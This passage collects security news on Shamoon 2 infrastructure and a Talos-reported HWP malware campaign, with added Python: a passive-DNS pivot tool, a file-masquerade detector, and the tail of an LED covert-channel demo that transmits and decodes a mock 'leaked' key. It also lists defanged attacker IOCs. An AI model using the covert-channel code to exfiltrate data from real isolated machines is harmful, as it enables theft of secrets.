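    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


def led_transmit(payload: bytes, spb: int = SAMPLES_PER_BIT) -> list:
    """Brightness samples (1 = lit, 0 = dark) for preamble + length + payload."""
    if len(payload) > 255:
        raise ValueError("single-frame demo: payload must fit one length byte")
    frame = PREAMBLE + bytes_to_bits(bytes([len(payload)])) + bytes_to_bits(payload)
    return [bit for bit in frame for _ in range(spb)]


def add_sample_noise(samples, every: int = 25) -> list:
    """Flip every n-th sample to mimic sensor glitches (constructed noise)."""
    return [s ^ 1 if i % every == every - 1 else s for i, s in enumerate(samples)]


def _slice_bits(samples, offset: int, spb: int):
    """Majority-vote each window starting at `offset`; return (bits, confidence)."""
    bits, confidence = [], 0
    for i in range(offset, len(samples) - spb + 1, spb):
        lit = sum(samples[i:i + spb])
        bits.append(1 if 2 * lit > spb else 0)
        confidence += abs(2 * lit - spb)   # spb = unanimous window, 1 = near tie
    return bits, confidence


def led_receive(samples, spb: int = SAMPLES_PER_BIT):
    """Recover the payload, or None if no complete frame is present."""
    # The correct alignment yields the least ambiguous windows, so keep the
    # offset with the highest total confidence.
    bits, _ = max((_slice_bits(samples, o, spb) for o in range(spb)),
                  key=lambda t: t[1])
    for start in range(len(bits) - len(PREAMBLE) + 1):
        if bits[start:start + len(PREAMBLE)] == PREAMBLE:
            break
    else:
        return None
    pos = start + len(PREAMBLE)
    if len(bits) < pos + 8:
        return None
    length = bits_to_bytes(bits[pos:pos + 8])[0]
    body = bits[pos + 8:pos + 8 + 8 * length]
    if len(body) < 8 * length:
        return None
    return bits_to_bytes(body)


if __name__ == "__main__":
    secret = b"key:4f2a"                              # constructed "leaked" value
    samples = led_transmit(secret)
    noisy = add_sample_noise([0, 0, 0] + samples)     # idle lead-in plus glitches
    print(len(samples), "samples;", led_receive(noisy))
```

The oversampling is what makes the channel tolerate a camera that misses or misreads a frame now and then; the offset search is what lets the receiver lock on without any shared clock. Covering or disconnecting the LED, as the researchers suggest, removes the channel altogether.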


Shamoon 2 malware, ASERT has shed light on the C2 and the infection process
26.2.2017 securityaffairs Virus

The analysis conducted by Arbor Networks on the Shamoon 2 malware has shed light on its control infrastructure and infection process.
Security researchers from Arbor Networks' Security Engineering and Response Team (ASERT) have carried out a new analysis of the Shamoon 2 malware, uncovering further details of the tools and techniques used by the threat actor.

The Shamoon 2 malware was first spotted in November 2016; a second variant of the same threat, discovered by researchers at Palo Alto Networks in January, was able to target virtualization products.

Shamoon, also known as Disttrack, was first discovered in a wave of attacks against companies in Saudi Arabia in 2012; the victims included the oil giant Saudi Aramco. Shamoon's principal capability is wiping data from the hard drives of infected systems.

In the attack on Saudi Aramco, Shamoon wiped data on over 30,000 computers and overwrote the hard drive MBR (Master Boot Record) with an image of a burning US flag.

The latest variant of the Shamoon 2 malware infected computers at petrochemical targets and at the Saudi Arabian central bank.


The researchers at Arbor Networks started from the findings of IBM's X-Force, which had discovered that the threat actor used weaponized documents containing a malicious macro that, once executed, connected to the C&C server via PowerShell commands.


By analyzing three of the X-Force malware samples, the researchers were able to locate the malicious domains and IP addresses used by the attackers.

“From the previous samples, we performed a passive DNS lookup on the IPs. We found get.adobe.go-microstf[.]com hosted at 104.218.120[.]128 around the time this campaign was ongoing, November 2016.” reads the analysis from Arbor Networks.

“Researching the domain go-microstf[.]com, hosted at 45.63.10[.]99, revealed yet another iteration of malicious executables. In this case, a URL used to download the PowerShell component shared a naming convention found in the IBM report, http://69.87.223[.]26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples.”

The domain go-microstf[.]com was initially set up to harvest Google Analytics logins in a spoofing campaign that started in January.

The researchers linked the Shamoon 2 malware to Middle Eastern state-sponsored groups, pointing to overlaps with the Magic Hound campaign and the PupyRAT tool.

One of the samples shared by IBM indicated that the document author was ‘gerry.knight’; the experts at ASERT used this detail to discover three additional macro-laden documents unrelated to the Shamoon 2 campaign. Those samples matched existing documents used by the threat actors behind the Magic Hound campaigns.

Further evidence linking the Shamoon 2 malware to Iranian hackers was a “sloo.exe” file dropped by the malicious code in a targeted PC’s Temp folder.

“Unlike newer samples, this one created a unique file ‘sloo.exe’. The file was created at C:\Documents and Settings\Admin\Local Settings\Temp\sloo.exe. In addition to this file, the sample also contacted 104.238.184[.]252 for the PowerShell executable.” reads the technical analysis published by Arbor Networks.
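The pivoting described in the two ASERT quotes (sample IPs, to passive DNS, to co-hosted domains, to the parent domain, to further samples) is a mechanical walk an analyst usually scripts. As an added example that is not ASERT's tooling, the block below performs that walk over a small passive-DNS table. The go-microstf[.]com rows reuse the domain/IP pairs quoted in the article; every ".invalid" name, the 203.0.113.10 host, the campaign window and the shared-hosting threshold are constructed assumptions, and the parent-domain rule assumes a one-label public suffix rather than a real suffix list.

```python
"""Passive-DNS style infrastructure pivot.

Added example, not ASERT's tooling. Starting from seed indicators it walks
domain -> hosting IP -> other domains on that IP (and subdomain -> parent
domain), restricted to records that overlap the campaign window, and
refuses to expand through IPs hosting more than a threshold of domains,
which usually means shared hosting rather than attacker infrastructure.
"""
import ipaddress
from collections import defaultdict, namedtuple
from datetime import date

Record = namedtuple("Record", "domain ip first_seen last_seen")

# Constructed passive-DNS table. The go-microstf[.]com rows reuse the
# domain/IP pairs quoted in the article; every ".invalid" name and the
# 203.0.113.10 host (RFC 5737 documentation range) are made up to show the
# window filter and the shared-hosting cut-off.
PDNS = [
    Record("get.adobe.go-microstf.com", "104.218.120.128", date(2016, 11, 1), date(2016, 11, 30)),
    Record("go-microstf.com",           "45.63.10.99",     date(2016, 11, 5), date(2017, 1, 20)),
    Record("go-microstf.com",           "203.0.113.10",    date(2016, 12, 1), date(2017, 1, 5)),
    Record("second-stage.invalid",      "45.63.10.99",     date(2017, 1, 2),  date(2017, 1, 25)),
    Record("stale.invalid",             "104.218.120.128", date(2014, 3, 1),  date(2014, 6, 1)),
] + [Record(f"shared-{i}.invalid", "203.0.113.10", date(2016, 1, 1), date(2017, 6, 1))
     for i in range(6)]

CAMPAIGN_WINDOW = (date(2016, 11, 1), date(2017, 1, 31))   # assumed window


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")


def defang(ioc: str) -> str:
    return ioc.replace(".", "[.]")


def is_ip(node: str) -> bool:
    try:
        ipaddress.ip_address(node)
        return True
    except ValueError:
        return False


def parent_domain(domain: str):
    """Registrable parent, assuming a one-label public suffix (no PSL lookup)."""
    labels = domain.split(".")
    return ".".join(labels[-2:]) if len(labels) > 2 else None


def pivot(records, seeds, window=CAMPAIGN_WINDOW, max_domains_per_ip=5):
    """Return (nodes, edges, skipped_ips) reachable from the (defanged) seeds."""
    start, end = window
    by_domain, by_ip = defaultdict(set), defaultdict(set)
    for r in records:
        if r.first_seen <= end and r.last_seen >= start:   # overlaps the window
            by_domain[r.domain].add(r.ip)
            by_ip[r.ip].add(r.domain)

    nodes = {refang(s) for s in seeds}
    frontier, edges, skipped = list(nodes), [], set()
    while frontier:
        node = frontier.pop()
        if is_ip(node):
            if len(by_ip[node]) > max_domains_per_ip:
                skipped.add(node)          # shared hosting: too noisy to pivot through
                continue
            neighbours = [(d, "hosts") for d in by_ip[node]]
        else:
            neighbours = [(ip, "resolves_to") for ip in by_domain[node]]
            parent = parent_domain(node)
            if parent:
                neighbours.append((parent, "parent"))
        for other, relation in neighbours:
            edges.append((node, relation, other))
            if other not in nodes:
                nodes.add(other)
                frontier.append(other)
    return nodes, edges, skipped


if __name__ == "__main__":
    nodes, edges, skipped = pivot(PDNS, ["get.adobe.go-microstf[.]com"])
    for src, rel, dst in edges:
        print(f"{defang(src)} --{rel}--> {defang(dst)}")
    print("not expanded (shared hosting):", sorted(defang(ip) for ip in skipped))
```

Two details matter in practice: the time window keeps a reused IP's old tenants out of the cluster, and the per-IP cap stops the walk from swallowing an entire shared-hosting provider the moment one attacker domain resolves there. Anything the cap skips is returned separately so an analyst can still look at it by hand.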


Targeted Malware Campaign Uses HWP Documents

25.2.2017 securityweek Virus

A recently observed targeted malware campaign against South Korean users was using Hangul Word Processor (HWP) documents as the infection vector, Talos researchers reveal.

Active between November 2016 and January 2017, the campaign targeted a limited number of people using the Hancom-developed alternative to Microsoft Office, chosen mainly because of its popularity among South Korean users. The malicious documents were written in Korean and purported to come from the Korean Ministry of Unification.

To increase the sense of legitimacy, the documents attempted to download a file from an official Korean government website, kgls.or.kr (Korean Government Legal Service). The file was a binary masquerading as a JPEG image, meant to be executed as part of the infection.

Talos researchers suspect the website was compromised specifically to lend the attack legitimacy. They also suggest that a sophisticated actor was behind the campaign: compromised sites were cleaned or removed after the attack, the final payload was nowhere to be found, the attackers didn't use the same infrastructure for more than a few days, and they never returned to infrastructure they had already used.

“Due to these elements it's likely that this loader has been designed by a well-funded group in order to target public sector entities in South Korea. Many of these techniques fit the profile of campaigns previously associated with attacks by certain government groups,” Talos says.

While uncommon, the use of HWP files for infection makes sense in context, as the software is widely used in Korea, including by the South Korean government. Moreover, because HWP is a regional file format, security devices may not be equipped to parse it, giving the attacker a vector that is less likely to be detected.

Titled “Analysis of ‘Northern New Year’ in 2017,” the document carries the logo of the Ministry of Unification, which works towards the reunification of North and South Korea. It describes the North Korean New Year celebrations and ends with two links to additional documents, telling users to double-click the links to access them.

When the decoy document is opened, the binaries execute wscript.exe and inject shellcode into the process. The shellcode, embedded in a resource called 'BIN', unpacks a second PE32 inside the legitimate wscript.exe process and executes it.

The collected data might have been used for reconnaissance, to decide whether the final payload should be sent. The analyzed sample first attempted to connect to an index.php file and then to a .jpg file, which might have been generated by the index.php script based on the collected data. The content of the .jpg file is saved as 'officepatch.exe' and executed.

Because the infrastructure was down during the analysis, the researchers could not examine the payload directly. They did, however, identify four C&C servers used by the actor, three in South Korea and a fourth in the Netherlands. The actors used a malicious document with multiple droppers for infection and C&C communication to obtain the final payload, alongside decoy documents, which shows that they relied on social engineering and enticement in the attack.
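Twice in this campaign a file's extension lies about its content: the first stage fetched from kgls.or.kr is a binary dressed up as a JPEG, and the second stage arrives as a .jpg that is written to disk as officepatch.exe. A proxy or sandbox that trusts the extension (or the Content-Type header) misses both. As an added example that is not Talos tooling, the block below classifies a download by its leading bytes instead and flags the mismatch. The JPEG, PE and OLE compound-file magic values are standard; the minimal PE32 header and the image bytes are constructed for the demonstration and are not runnable code.

```python
"""Content sniffing for downloads whose extension may lie.

Added example, not Talos tooling. The check ignores the file name and
inspects the leading bytes: a JPEG starts with FF D8 FF, a PE file starts
with "MZ" and carries a "PE\\0\\0" signature at the offset stored in
e_lfanew (0x3C), and an HWP 5.x document is an OLE compound file
(D0 CF 11 E0 A1 B1 1A E1). All sample bytes below are constructed.
"""
import struct

JPEG_MAGIC = b"\xff\xd8\xff"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664

# Extension -> content types that extension may legitimately carry.
EXPECTED_BY_EXT = {
    "jpg": {"jpeg"}, "jpeg": {"jpeg"},
    "hwp": {"ole-compound"},
    "exe": {"pe32", "pe32+", "pe"},
}


def sniff(data: bytes) -> str:
    """Return a content type derived from magic bytes, never from the name."""
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    if data.startswith(OLE_MAGIC):
        return "ole-compound"          # container used by HWP 5.x and legacy Office
    if data.startswith(b"MZ") and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if e_lfanew + 6 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
            if machine == IMAGE_FILE_MACHINE_I386:
                return "pe32"
            if machine == IMAGE_FILE_MACHINE_AMD64:
                return "pe32+"
            return "pe"
        return "mz"                    # DOS stub or truncated image
    return "unknown"


def is_masquerade(name: str, data: bytes) -> bool:
    """True when the extension promises one type but the bytes say another."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    expected = EXPECTED_BY_EXT.get(ext)
    if expected is None:
        return False                   # unknown extension: nothing to contradict
    return sniff(data) not in expected


def build_fake_pe32() -> bytes:
    """Constructed minimal PE32 header (not a working executable) for the demo."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)        # e_lfanew -> PE signature
    header += b"PE\0\0" + struct.pack("<H", IMAGE_FILE_MACHINE_I386) + bytes(18)
    return bytes(header)


if __name__ == "__main__":
    # Constructed stand-ins for the two downloads described in the article.
    samples = {
        "stage1.jpg": build_fake_pe32(),              # binary posing as an image
        "decoy.hwp": OLE_MAGIC + bytes(8),            # genuine-looking HWP container
        "photo.jpg": b"\xff\xd8\xff\xe0" + bytes(12), # real JPEG header
    }
    for name, data in samples.items():
        print(f"{name}: sniffed={sniff(data)} masquerade={is_masquerade(name, data)}")
```

The same check applies to the second stage: a response to a .jpg URL whose body sniffs as "pe32" is exactly the "officepatch.exe" case and is worth blocking or at least alerting on, regardless of what the server's headers claim.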

“This campaign has clearly targeted a specific group of users; this rings true with the use of such specific file formats. Steps were clearly taken to limit the ability of security products to detect the threat, as well as adherence to a strict timeline to prevent the malicious files from being discovered. The attackers were careful to remove their malicious payloads and not re-use their infrastructure,” Talos says. The attackers are believed to have attempted “to gain a foothold into assets which can be deemed extremely valuable.”

Responding to a SecurityWeek inquiry via email, a Talos representative said they couldn’t attribute the attacks to a specific actor: “The attackers had access to native Korean speakers and have a high degree of sophistication. However, any conjecture about what specific group or nation state might be behind the attack is pure speculation as the patterns are consistent with a few groups”.